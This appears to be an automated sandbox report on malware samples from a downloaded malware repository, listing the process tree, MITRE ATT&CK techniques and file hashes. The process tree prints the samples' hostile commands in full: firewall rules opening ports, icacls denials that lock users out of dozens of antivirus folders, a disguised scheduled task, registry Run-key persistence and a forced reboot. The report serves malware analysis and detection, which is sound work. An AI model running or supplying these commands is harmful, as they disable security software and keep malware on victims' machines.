C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 12⤵
- Scheduled Task/Job: Scheduled Task
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\LoveYou.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\LoveYou.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\HMBlocker.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\HMBlocker.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\shutdown.exe"C:\Windows\System32\shutdown.exe" /r /t 6 /f2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\HMBlocker.exe\"" /f2⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\HMBlocker.exe\"" /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3fa2055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
8Discovery
Browser Information Discovery
1Password Policy Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
2Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD5c5ec8996fc800325262f5d066f5d61c9
SHA195f8e486960d1ddbec88be92ef71cb03a3643291
SHA256892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA5124721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a
-
Filesize
35KB
MD52f6a1bffbff81e7c69d8aa7392175a72
SHA194ac919d2a20aa16156b66ed1c266941696077da
SHA256dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37
-
Filesize
140B
MD55e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
Filesize
12KB
MD5806734f8bff06b21e470515e314cfa0d
SHA1d4ef2552f6e04620f7f3d05f156c64888c9c97ee
SHA2567ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544
SHA512007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207
-
Filesize
961KB
MD503a781bb33a21a742be31deb053221f3
SHA13951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45
-
Filesize
418B
MD5db76c882184e8d2bac56865c8e88f8fd
SHA1fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92
-
Filesize
40B
MD57476b53072467db7bee17ddd7194838e
SHA16e5bd209d7567cb97ba5aa2abcf1a04bd4b32220
SHA25649bb741e01de9ee2977a43c1af7b92d07b7291c20d5fca51001439a43dde80d3
SHA512a79c62357fb329ab8ca70e18e9c43442a6e575cab0c83f0fa8b9be2071eeb010af0c7747ed67f3a6a9444f35e2ff655fe29980e448ba26f8d3018e03ea4ebb2d
-
Filesize
649B
MD54923600b5f12d34ab31179e3c1875c3d
SHA1889b3c5aa651e6d96d72c34e22cd52fb2d28d465
SHA2560f620b662170bc3b54bf4a600420e6e6d6a7fff50d553a56fa5f26eb4b2ede5d
